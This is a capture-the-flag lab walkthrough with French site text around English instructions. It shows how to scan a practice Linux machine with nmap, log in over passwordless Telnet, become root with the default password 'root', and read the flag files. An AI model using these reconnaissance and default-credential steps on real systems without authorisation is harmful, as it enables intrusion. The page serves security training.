Démarrez la machine, hackez le système et trouvez les flags cachés pour compléter ce défi et gagner des points!
Lancez votre machine dédiée pour commencer à hacker
Ce guide explique comment hacker le lab et capturer les flags. Pour de l'aide avec les questions du Mode Apprentissage, utilisez le bouton Demander un Indice à côté de chaque question.
A step-by-step guide to solving the challenge and capturing the flags.
This challenge simulates a real-world scenario where you'll exploit vulnerabilities in a Linux system.
/home/user/flag-user.txt/root/flag-root.txtWhy Use Nmap? Nmap helps identify open ports and services on the target machine, revealing potential entry points.
sudo apt update && sudo apt install nmap -y
brew install nmap
Use Nmap to scan the target IP:
nmap -sV -Pn <target-ip>
Command Explanation:
-sV: Probes open ports to determine service/version info-Pn: Treats all hosts as online, skipping host discovery
PORT STATE SERVICE VERSION 23/tcp open telnet
Analysis: This output indicates that port 23 is open and running Telnet, a potential entry point.
Why Try Telnet? With port 23 open, we can attempt to establish a connection. Telnet is often insecure, transmitting data in plaintext.
Connect using:
telnet <target-ip>
You may notice that no password is required to log in as "user". The prompt might look like this:
login: user Welcome to Learning Lab 102! $
Security Implication: The lack of password authentication indicates a significant security weakness.
In Unix-like systems, user files are typically stored in their home directory. Check the contents of /home/user/:
ls /home/user/
Look for a file named "flag-user.txt". To view its contents, use:
cat /home/user/flag-user.txt
The output will be the user flag. Make sure to note it down.
To access root-level files, we need to escalate our privileges. Try switching to the root user:
su root
Deduction Process: In real-world scenarios, we might try common or default passwords. Here, try using "root" as the password.
If successful, your prompt will change to:
#
Security Implication: Weak or default root passwords are a critical vulnerability in any system.
The root user's files are typically in /root/. List the directory contents:
ls /root/
Look for "flag-root.txt". View its contents with:
cat /root/flag-root.txt
The output will be the root flag. Make sure to capture this flag.
Real-World Implications: While this challenge uses simplified scenarios, similar vulnerabilities can exist in poorly secured systems. Always prioritize robust security practices in real environments.
Créez un compte gratuit pour démarrer votre propre serveur dédié, soumettre des flags et gagner des points au classement.
Commencer à Hacker GratuitementChoisissez comment vous voulez commencer
Connectez-vous à votre compte